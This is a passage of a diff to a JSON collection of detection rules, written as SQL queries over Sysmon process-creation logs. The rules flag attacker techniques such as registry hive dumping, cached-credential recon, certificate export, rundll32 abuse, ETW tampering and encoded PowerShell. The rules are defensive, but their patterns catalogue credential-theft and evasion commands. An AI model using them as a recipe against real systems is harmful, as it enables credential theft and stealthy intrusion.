tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", - "author": "Cian Heasley", + "title": "Potential RDP Session Hijacking Activity", + "id": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "status": "experimental", + "description": "Detects potential RDP Session Hijacking activity on Windows systems", + "author": "@juju4", "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.execution" ], "falsepositives": [ - "Legitimate uses of Mouse Lock software" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%Mouse Lock%' ESCAPE '\\' OR Company LIKE '%Misc314%' ESCAPE '\\' OR CommandLine LIKE '%Mouse Lock\\_%' ESCAPE 
'\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\tscon.exe' ESCAPE '\\' OR OriginalFileName = 'tscon.exe') AND IntegrityLevel = 'SYSTEM')" ], - "filename": "proc_creation_win_pua_mouselock_execution.yml" + "filename": "proc_creation_win_tscon_rdp_session_hijacking.yml" }, { - "title": "APT27 - Emissary Panda Activity", - "id": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "title": "Suspicious Rundll32 Activity", + "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", "status": "test", - "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious process related to rundll32 based on arguments", + "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1574.002", - "attack.g0027" + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\sllauncher.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%-k%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE 
'%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR 
(ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.cpl\",' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_apt27_emissary_panda.yml" + "filename": "proc_creation_win_rundll32_susp_activity.yml" }, { - "title": "WinDbg/CDB LOLBIN Usage", - "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "title": "Certificate Exported Via Certutil.EXE", + "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", "status": "test", - "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", - "attack.t1218", - "attack.t1127" + "attack.t1027" ], "falsepositives": [ - "Legitimate use of debugging tools" + "There legitimate reasons to export certificates. 
Investigate the activity to determine if it's benign" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cdb.exe' ESCAPE '\\' OR OriginalFileName = 'CDB.Exe') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -cf %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cdb.yml" + "filename": "proc_creation_win_certutil_export_pfx.yml" }, { - "title": "Webshell Recon Detection Via CommandLine & Processes", - "id": "f64e5c19-879c-4bae-b471-6d84c8339677", + "title": "Permission Check Via Accesschk.EXE", + "id": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "status": "test", + "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "falsepositives": [ + "System administrator Usage" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AccessChk' ESCAPE '\\' OR Description LIKE '%Reports effective permissions%' ESCAPE '\\' OR (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\') OR OriginalFileName = 'accesschk.exe') AND (CommandLine LIKE '%uwcqv %' ESCAPE '\\' OR CommandLine LIKE '%kwsu %' ESCAPE '\\' OR CommandLine LIKE '%qwsu %' ESCAPE '\\' OR CommandLine LIKE '%uwdqs %' ESCAPE '\\'))" + ], + "filename": 
"proc_creation_win_sysinternals_accesschk_check_permissions.yml" + }, + { + "title": "ETW Logging Tamper In .NET Processes", + "id": "41421f44-58f9-455d-838a-c398859841d4", "status": "test", - "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", - "author": "Cian Heasley, Florian Roth", + "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND (CommandLine LIKE '%perl --help%' ESCAPE '\\' OR CommandLine LIKE '%python --help%' ESCAPE '\\' OR CommandLine LIKE '%python -h%' ESCAPE '\\' OR CommandLine LIKE '%python3 --help%' ESCAPE '\\' OR CommandLine LIKE '%python3 -h%' ESCAPE '\\' OR CommandLine LIKE '%wget --help%' ESCAPE '\\' 
OR CommandLine LIKE '%perl -h%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_recon_detection.yml" + "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" }, { - "title": "Potential CVE-2021-26857 Exploitation Attempt", - "id": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", - "status": "stable", - "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", - "author": "Bhabesh Raj", + "title": "Suspicious Git Clone", + "id": "aef9d1f1-7396-4e92-a927-4567c7a495c1", + "status": "experimental", + "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1203", - "attack.execution", - "cve.2021.26857" + "attack.reconnaissance", + "attack.t1593.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((Image LIKE '%wermgr.exe' ESCAPE '\\' OR Image LIKE '%WerFault.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\git.exe' ESCAPE '\\' OR Image LIKE '%\\\\git-remote-https.exe' ESCAPE '\\') OR OriginalFileName = 'git.exe') AND (CommandLine LIKE '% clone %' ESCAPE '\\' OR CommandLine LIKE '%git-remote-https %' ESCAPE '\\') AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR 
CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26857_msexchange.yml" + "filename": "proc_creation_win_git_susp_clone.yml" }, { - "title": "Abusing Findstr for Defense Evasion", - "id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", + "title": "Verclsid.exe Runs COM Object", + "id": "d06be4b9-8045-428b-a567-740a26d9db25", "status": "test", - "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", + "description": "Detects when verclsid.exe is used to run COM object via GUID", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.t1564.004", - "attack.t1552.001", - "attack.t1105" + "attack.t1218" ], "falsepositives": [ - "Administrative findstr usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%findstr%' ESCAPE '\\' OR Image LIKE '%findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (((CommandLine LIKE '% /v %' ESCAPE '\\' OR CommandLine LIKE '% -v %' ESCAPE '\\') AND (CommandLine LIKE '% /l %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\')) OR ((CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '% -s %' ESCAPE '\\') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% -i %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_findstr.yml" + "filename": "proc_creation_win_verclsid_runs_com.yml" }, { - "title": "Potential Rundll32 Execution With DLL Stored In ADS", - "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "title": "Potential File Overwrite Via Sysinternals SDelete", + "id": "a4824fca-976f-4964-b334-0621379e84c4", "status": "experimental", - "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", - "author": "Harjot Singh, '@cyb3rjy0t'", + "description": "Detects the use of SDelete to erase a file not the free space", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.impact", + "attack.t1485" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "NtdllPipe Like Activity Execution", - "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", - "status": "test", - "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. 
As seen being used in the POC NtdllPipe", - "author": "Florian Roth (Nextron Systems)", + "title": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", + "id": "fbd7c32d-db2a-4418-b92c-566eb8911133", + "status": "experimental", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SyncAppvPublishingServer.exe' ESCAPE '\\' OR OriginalFileName = 'syncappvpublishingserver.exe') AND CommandLine LIKE '%\"n; %' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" }, { - "title": "ShimCache Flush", - "id": "b0524451-19af-4efa-a46f-562a977f792e", - "status": "stable", - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", + "status": "experimental", + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1059.001" ], 
"falsepositives": [ - "Unknown" + "Other tools that work with encoded scripts in the command line instead of script files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%apphelp.dll%' ESCAPE '\\' AND (CommandLine LIKE '%ShimFlushCache%' ESCAPE '\\' OR CommandLine LIKE '%#250%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%kernel32.dll%' ESCAPE '\\' AND (CommandLine LIKE '%BaseFlushAppcompatCache%' ESCAPE '\\' OR CommandLine LIKE '%#46%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentImage LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rundll32_susp_shimcache_flush.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Renamed Vmnat.exe Execution", - "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "title": "DLL Loaded via CertOC.EXE", + "id": "242301bc-f92f-4476-8718-78004a6efd9f", "status": "experimental", - "description": "Detects renamed vmnat.exe or portable version that can be used for 
DLL side-loading", - "author": "elhoim", + "description": "Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'vmnat.exe' AND NOT ((Image LIKE '%vmnat.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_vmnat.yml" + "filename": "proc_creation_win_certoc_load_dll.yml" }, { - "title": "Dumping of Sensitive Hives Via Reg.EXE", - "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "status": "test", - "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "status": "experimental", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" + "attack.t1003.005" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. 
backup or forensic investigation" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "Lazarus System Binary Masquerading", - "id": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", - "status": "test", - "description": "Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location", - "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "status": "experimental", + "description": 
"Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' OR Image LIKE '%\\\\gpsvc.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_lazarus_binary_masquerading.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "HackTool - Bloodhound/Sharphound Execution", - "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", - "status": "test", - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Other programs that use these command line option and accepts an 'All' parameter" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (Image LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine 